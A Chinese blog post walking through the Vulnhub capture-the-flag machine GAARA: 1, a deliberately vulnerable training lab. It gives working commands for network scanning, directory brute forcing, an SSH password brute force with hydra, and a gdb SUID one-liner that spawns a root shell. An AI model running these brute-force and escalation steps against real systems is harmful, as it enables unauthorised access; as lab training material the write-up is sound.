zoukankan      html  css  js  c++  java
  • Vulnhub实战靶场:GAARA: 1

    一、环境搭建

    1、官网下载连接:https://www.vulnhub.com/entry/gaara-1,629/

    2、下载之后,使用Oracle VM VirtualBox导入靶场环境

    3、为了正常练习,将靶场的网卡模式设置为桥接模式,启动即可

     二、靶场攻略

    1、探测出靶场ip:nmap -sP --min-hostgroup 1024 --min-parallelism 1024  10.10.114.0/24

     2、探测靶场端口、服务寻找突破口:nmap -sS -A 10.10.114.230,启动了80和22端口,突破口肯定在80的web服务中

     访问80端口,首页只有一个图片,没有任何提示信息

     

     3、扫描网站目录:gobuster dir -e -u http://10.10.114.230 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

     访问返回200的http://10.10.114.230/Cryoserver,网页里直接一个非常大的白底页面,拉倒最下边才发现提示

     4、一个个访问提示的目录,最后在/iamGaara目录中,看到一串账号密码:Gaara f1MgN9mTf9SNbzRygcU(PS:眼睛都快看瞎了)

     下一步就是解密,使用的base58的加密方法,得到明文账号密码,gaara:ismyname,尝试用解密的账号密码登录ssh,发现密码是错误的,不过账户名没问题是可以登录的

     5、尝试爆破密码:hydra -l gaara -P /usr/share/wordlists/rockyou.txt -t 30 ssh://10.10.114.230,成功爆破得到密码为:iloveyou2

     再次使用ssh登录,成功登录,得到第一个flag,还有下一个提示

     6、提示为base64加密的内容,是一个目录

     访问提示的目录,查看隐藏文件,发现下一个提示

     使用的Brainfuck加密,解密之后,就是一句嘲讽

     7、还是需要提权,先试试SUID:find / -perm -u=s -type f 2>/dev/null

     参考资料:https://gtfobins.github.io/gtfobins/gdb/,需要python环境,系统中正好有

     利用查到的资料,进入/usr/bin,执行命令:./gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit,成功提权

     得到root下的falg

     完

  • 相关阅读:
    【UVA1515 算法竞赛入门指南】 水塘【最小割】
    【uva1658 算法竞赛入门经典】海军上将【费用流】
    【UVA11613 训练指南】生产销售规划 【费用流】
    【UVA10079 训练指南】收集者的难题【最大流】
    【LA2531 训练指南】足球联赛 【最大流】
    【LA2957 训练指南】运送超级计算机【二分,最大流】
    「高等数学学习笔记 DAY2」
    「高等数学学习笔记 DAY1」
    「CF1325D Ehab the Xorcist」
    「CF1325C Ehab and Path-etic MEXs」
  • 原文地址:https://www.cnblogs.com/sym945/p/14557426.html
Copyright © 2011-2022 走看看